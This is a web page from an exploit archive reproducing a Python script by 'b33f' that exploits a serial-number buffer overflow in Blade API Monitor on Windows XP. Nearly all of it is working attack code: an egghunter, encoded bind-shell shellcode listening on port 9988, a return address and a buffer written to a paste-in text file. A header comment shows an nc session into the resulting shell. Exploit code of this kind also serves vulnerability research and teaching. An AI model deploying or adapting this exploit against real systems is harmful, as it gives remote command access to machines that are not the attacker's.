Home / exploits Blade API Monitor Unicode Bypass Buffer Overflow
Posted on 21 February 2012
#!/usr/bin/python -w #---------------------------------------------------------------------------------# # Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com # # http://www.fuzzysecurity.com/exploits/8.html # # OS: WinXP PRO SP3 # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ # # f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe # # # # Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ # #---------------------------------------------------------------------------------# # This is a super strange exploit. First I would like to commend "FullMetalFouad" # # for the unicode work on the original exploit. Originally I wanted to see if I # # could simplify the process. While I was doing that I lost sight of the fact # # that the instructions had to be printable since we need to copy them from a # # text file. When I opened my POC I saw that all the characters had been # # converted to weird blocks (check my site for a screenshot). On a whim I tried # # to paste these characters in the serial number field and amazingly the buffer # # in the debugger was intact but with one important difference, the unicode had # # been converted back to regular ASCII!! Very strange but super fortunate!! If # # you want to experiment with the exploit just keep in mind to (1) open it in # # windows notepad and (2) that all the characters need to be converted to those # # blocks for it to work (depending on your buffer this isn't always the case). # #---------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.128 9988 # # (UNKNOWN) [192.168.111.128] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:Program FilesBladeAPIMonitor>ipconfig # # ipconfig # # # # Windows IP Configuration # # # # # # Ethernet adapter Local Area Connection: # # # # Connection-specific DNS Suffix . : localdomain # # IP Address. . . . . . . . . . . . : 192.168.111.128 # # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # # Default Gateway . . . . . . . . . : # # # # C:Program FilesBladeAPIMonitor> # #---------------------------------------------------------------------------------# filename="PasteMe.txt" #---------------------------------------------------------------------------------# # Originally unicode instructions to put an address in EAX, here it is used to # # trigger notepad bug and get UNICODE => ASCII conversion... # #---------------------------------------------------------------------------------# UniKill = ( "xB8x06xAAx6Fx50" "x6Fx4Cx6Fx58x6F" "x05x73x00x6FxB0" "xB9xD8xAAx6FxE8") #Egghunter - Marker b33f #Size 32-bytes hunter = ( "x66x81xcaxff" "x0fx42x52x6a" "x02x58xcdx2e" "x3cx05x5ax74" "xefxb8x62x33" #b3 "x33x66x8bxfa" #3f "xafx75xeaxaf" "x75xe7xffxe7") #msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #Size 742-bytes shellcode = ( "xd9xe1xd9x74x24xf4x59x49x49x49x49x49x49x49x49" "x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41x58" "x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" "x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" "x48x68x4bx39x37x70x45x50x53x30x71x70x4fx79x69" "x75x34x71x79x42x53x54x4cx4bx71x42x64x70x6cx4b" "x42x72x66x6cx6cx4bx73x62x57x64x4ex6bx73x42x36" "x48x36x6fx4fx47x71x5ax44x66x56x51x49x6fx75x61" "x69x50x4cx6cx45x6cx61x71x61x6cx63x32x44x6cx47" "x50x49x51x6ax6fx56x6dx55x51x49x57x4bx52x58x70" "x62x72x76x37x4ex6bx56x32x34x50x6cx4bx47x32x37" "x4cx73x31x5ax70x6cx4bx61x50x62x58x4dx55x49x50" "x63x44x50x4ax36x61x5ax70x50x50x6ex6bx33x78x74" "x58x4cx4bx63x68x57x50x45x51x4ax73x38x63x67x4c" "x42x69x4ex6bx56x54x6cx4bx47x71x7ax76x35x61x59" "x6fx56x51x49x50x6ex4cx6bx71x4ax6fx46x6dx67x71" "x48x47x46x58x59x70x62x55x4ax54x56x63x43x4dx79" "x68x75x6bx73x4dx46x44x63x45x4bx52x61x48x6ex6b" "x70x58x46x44x65x51x4bx63x32x46x4cx4bx44x4cx50" "x4bx4cx4bx46x38x77x6cx65x51x6bx63x4cx4bx76x64" "x6ex6bx56x61x38x50x6ex69x32x64x76x44x44x64x71" "x4bx71x4bx75x31x73x69x72x7ax72x71x59x6fx59x70" "x76x38x63x6fx51x4ax4cx4bx74x52x78x6bx4ex66x71" "x4dx51x78x67x43x46x52x37x70x43x30x31x78x71x67" "x51x63x35x62x71x4fx76x34x42x48x50x4cx53x47x31" "x36x54x47x69x6fx49x45x68x38x4ex70x37x71x67x70" "x35x50x37x59x7ax64x52x74x50x50x63x58x51x39x4b" "x30x30x6bx75x50x39x6fx69x45x32x70x76x30x42x70" "x66x30x73x70x62x70x31x50x42x70x43x58x49x7ax64" "x4fx4bx6fx39x70x59x6fx5ax75x6bx39x78x47x30x31" "x49x4bx62x73x33x58x74x42x43x30x65x77x53x34x4c" "x49x4ax46x70x6ax44x50x46x36x56x37x63x58x79x52" "x39x4bx34x77x55x37x6bx4fx38x55x62x73x76x37x53" "x58x6fx47x4bx59x37x48x6bx4fx69x6fx58x55x72x73" "x30x53x53x67x50x68x54x34x78x6cx65x6bx6bx51x39" "x6fx6ex35x61x47x6cx49x78x47x73x58x31x65x70x6e" "x30x4dx45x31x79x6fx49x45x43x58x50x63x70x6dx43" "x54x67x70x4dx59x39x73x76x37x53x67x32x77x56x51" "x69x66x30x6ax52x32x36x39x33x66x6ax42x6bx4dx62" "x46x6bx77x30x44x34x64x35x6cx43x31x67x71x4cx4d" "x50x44x74x64x32x30x6fx36x75x50x53x74x70x54x32" "x70x70x56x56x36x76x36x62x66x76x36x72x6ex36x36" "x52x76x71x43x30x56x73x58x64x39x7ax6cx35x6fx6c" "x46x59x6fx6ex35x6bx39x59x70x70x4ex51x46x47x36" "x39x6fx34x70x55x38x44x48x6cx47x37x6dx33x50x49" "x6fx4ax75x6dx6bx5ax50x6fx45x79x32x72x76x55x38" "x4fx56x4dx45x4fx4dx4fx6dx6bx4fx69x45x47x4cx67" "x76x43x4cx55x5ax6dx50x79x6bx4dx30x51x65x33x35" "x4fx4bx62x67x37x63x31x62x62x4fx53x5ax37x70x76" "x33x49x6fx4bx65x41x41") #---------------------------------------------------------------------------------# # (*) Due to the wierd conversion i couldn't do proper badchar analysis # # (1) 0x00425e04 : push esp # ret | startnull,ascii ==> BladeAPIMonitor.exe # # (2) egghunter: We do this because we need more space than we have at ESP # # (3) alpha mixed Bindshell port 9988 # #---------------------------------------------------------------------------------# egg = "x90"*18 + hunter evil = "x90"*10 + "b33f"*2 + shellcode buffer = UniKill + "A"*560 + "x04x5Ex42x00" + egg + "B"*500 + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
